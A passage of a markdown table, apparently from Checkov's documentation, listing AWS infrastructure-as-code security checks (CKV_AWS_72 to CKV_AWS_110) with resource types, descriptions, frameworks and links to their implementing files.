[RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) | +| 319 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) | +| 320 | CKV_AWS_73 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) | +| 321 | CKV_AWS_73 | resource | AWS::Serverless::Api | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) | +| 322 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) | +| 323 | CKV_AWS_74 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Cloudformation | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBEncryption.py) | +| 324 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) | +| 325 | CKV_AWS_75 | resource | aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) | +| 326 | CKV_AWS_76 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) | +| 327 | CKV_AWS_76 | resource | AWS::Serverless::Api | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) | +| 328 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | +| 329 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | +| 330 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) | +| 331 | CKV_AWS_78 | resource | AWS::CodeBuild::Project | Ensure that CodeBuild Project encryption is not disabled | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py) | +| 332 | CKV_AWS_78 | resource | aws_codebuild_project | Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) | +| 333 | CKV_AWS_79 | resource | AWS::EC2::LaunchTemplate | Ensure Instance Metadata Service Version 1 is not enabled | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py) | +| 334 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 335 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 336 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 337 | CKV_AWS_80 | resource | AWS::MSK::Cluster | Ensure MSK Cluster logging is enabled | Cloudformation | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py) | +| 338 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) | +| 339 | CKV_AWS_81 | resource | AWS::MSK::Cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Cloudformation | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py) | +| 340 | CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | +| 341 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 342 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 343 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 344 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 345 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 346 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 347 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 348 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 349 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 350 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) | +| 351 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | +| 352 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 353 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has Access Logging enabled | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 354 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) | +| 355 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | +| 356 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | +| 357 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | +| 358 | CKV_AWS_88 | resource | [?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 359 | CKV_AWS_88 | resource | [?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 360 | CKV_AWS_88 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 361 | CKV_AWS_88 | resource | [].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 362 | CKV_AWS_88 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 363 | CKV_AWS_88 | resource | [].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 364 | CKV_AWS_88 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 365 | CKV_AWS_88 | resource | [].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 366 | CKV_AWS_88 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 367 | CKV_AWS_88 | resource | [].tasks[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 368 | CKV_AWS_88 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 369 | CKV_AWS_88 | resource | [].tasks[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 370 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 371 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 372 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 373 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 374 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 375 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 376 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 377 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 378 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) | +| 379 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | +| 380 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) | +| 381 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 382 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 383 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) | +| 384 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | +| 385 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 386 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 387 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 388 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 389 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | +| 390 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | +| 391 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) | +| 392 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | +| 393 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 394 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 395 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | +| 396 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) | +| 397 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | +| 398 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 399 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 400 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) | +| 401 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | +| 402 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | +| 403 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) | +| 404 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 405 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 406 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 407 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) | +| 408 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | +| 409 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) | +| 410 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | +| 411 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | +| 412 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 413 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 414 | CKV_AWS_107 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 415 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 416 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 417 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | +| 418 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 419 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 420 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 421 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 422 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 423 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | +| 424 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 425 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 426 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 427 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 428 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 429 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | +| 430 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | 